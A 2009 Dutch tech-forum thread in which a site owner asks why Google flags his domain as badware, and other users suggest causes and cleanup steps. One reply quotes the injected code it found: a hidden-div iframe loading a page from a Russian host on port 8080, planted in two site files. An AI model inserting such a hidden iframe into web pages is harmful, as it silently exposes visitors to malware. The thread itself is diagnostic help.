Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien

maandag 28 september 2009 17:59

Acties:
  • Ad Hox
  • Registratie: Maart 2003
  • Laatst online: 29-11 19:53

Ad Hox

N/A

Topicstarter
Ik heb last van badware als er via Google naar een domein wordt gezocht, welke ik beheer. Ik heb me even ingelezen op o.a. http://www.stopbadware.org/home/security en ben ingelogd op het dashboard van Google, maar ik kan niet terug vinden waar de badware zou moeten zitten.

Volgens het dashboard op de index.php, maar ik zie geen 'rare' codes, zowel in het bronbestand als bij de source (rechtsmuisknop > view source).

Ik heb al het wachtwoord veranderd. Er zit een database achter de website met o.a. een registratie voor de nieuwsbrief en nieuwsberichten.

Waar kan het nog aan liggen?

Het betreft domein: decoolsingers.nl

maandag 28 september 2009 18:52

Acties:
  • har0
  • Registratie: December 2006
  • Laatst online: 10-02-2022

har0

Als u de eigenaar van deze site bent, kunt u een verzoek indienen voor een controle van uw site met de Webmasterhulpprogramma's van Google. Raadpleeg het Helpcentrum voor webmasters voor meer informatie over het beoordelingsproces.
Advies geleverd door Google

Een deel van deze site is in de afgelopen 90 dagen 1 keer aangemerkt wegens verdachte activiteiten.

verder krijg ik best specifieke info over wat er mis is , ik denk dat je wat verder moet kijken ?

maandag 28 september 2009 20:51

Acties:

Verwijderd

OpenDNS blokkeert de website ook en Firefox geeft de onderstaande waarschuwing:

www.decoolsingers.nl:443 gebruikt een ongeldig beveiligingscertificaat.

Het certificaat wordt niet vertrouwd omdat het uitgeverscertificaat onbekend is.
Het certificaat is voor geen enkele sernaam geldig.
Het certificaat is verlopen op 20-10-2001 20:21

Los dus eerst met spoed het probleem met je certificaat op!

maandag 28 september 2009 20:52

Acties:

Verwijderd

Daarna kun je kijken hoe je de onderstaande problemen gaat aanpakken:

http://safebrowsing.clien...s://www.decoolsingers.nl/

maandag 28 september 2009 21:00

Acties:

Verwijderd

Verwijderd schreef op maandag 28 september 2009 @ 20:51:

Los dus eerst met spoed het probleem met je certificaat op!
:O Wat heeft dat met het probleem van de TS te maken?
Hij kan zich beter richten op het echte probleem en dat heeft echt niets met SSL te maken.

maandag 28 september 2009 21:19

Acties:

Verwijderd

Verwijderd schreef op maandag 28 september 2009 @ 21:00:
[...]

:O Wat heeft dat met het probleem van de TS te maken?
Hij kan zich beter richten op het echte probleem en dat heeft echt niets met SSL te maken.
Dat is in 2 tellen op te lossen, het andere probleem kost veel meer tijd.
Wellicht kan hij een backup terug zetten.

maandag 28 september 2009 21:43

Acties:
  • Foamy
  • Registratie: November 2006
  • Laatst online: 24-11 17:20

Foamy

Fulltime prutser

Verwijderd schreef op maandag 28 september 2009 @ 21:19:
[...]
Dat is in 2 tellen op te lossen, het andere probleem kost veel meer tijd.
Wellicht kan hij een backup terug zetten.
Backup terugzetten heeft in dit soort gevallen helaas weinig zin....

Meestal word dit veroorzaakt doordat een computer waarop de FTP gegevens bekend zijn een virusinfectie te pakken heeft (Conficker/Downadup gaat lekker rond de laatste tijd). Zorg is dus om eerst dat probleem te tackelen.. Zorg dat je achterhaalt welke pc besmet is, isoleer deze en zorg dat ie schoon raakt.

Hierna heeft het ook pas nut om het FTP wachtwoord te wijzigen. Dat is dus stap 2. Hierna kun je overgaan tot het terugplaatsen van een schone versie van de website.

blub

maandag 28 september 2009 22:22

Acties:
  • Ad Hox
  • Registratie: Maart 2003
  • Laatst online: 29-11 19:53

Ad Hox

N/A

Topicstarter
Dank, ik heb de suggestie van Google gezien om het verzoek in te dienen. M.i. kan ik dat het beste doen als het probleem daadwerkelijk is opgelost.

Op de site wordt, voor zover ik weet, geen gebruik gemaakt van SSL/certificaten. Wel is er een beveiligde 'dir' aanwezig. FTP gegevens zijn inmiddels gewijzigd. Ik zal de gegevens van de beveiligde dir ook wel even aanpassen.

Volgens mij ligt het niet aan de inhoud van de website. Er staan alleen .php bestanden op en een paar afbeeldingen. Ik neem aan dat het niet in je DB kan zitten?

maandag 28 september 2009 22:30

Acties:

Verwijderd

/eng/index2.php
HTML:
1

<div style="display:none"><iframe width=136 height=645 src="http://deathtesting.ru:8080/index.php" ></iframe></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none">...etc


/eng/index.html
HTML:
1

<div style="display:none"><iframe width=136 height=645 src="http://deathtesting.ru:8080/index.php" ></iframe></div><div style="display:none"></div><div style="display:none"></div><div style="display:none">...etc


Dat is het wel ongeveer...
Even uitgezocht met een wget -r --mirror van je site, en vervolgens een recursieve grep op '<iframe'

maandag 28 september 2009 22:34

Acties:

Verwijderd

Ik zou alle bestanden doorzoeken op een link naar ip-adressen en domeinen in rusland.
Kennelijk staat daar de malware die wordt geupload via jou website, mogelijk via een javascript.

[ Voor 10% gewijzigd door Verwijderd op 28-09-2009 22:35 ]

Pagina: 1
Reageer

Apple iPhone 17 LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq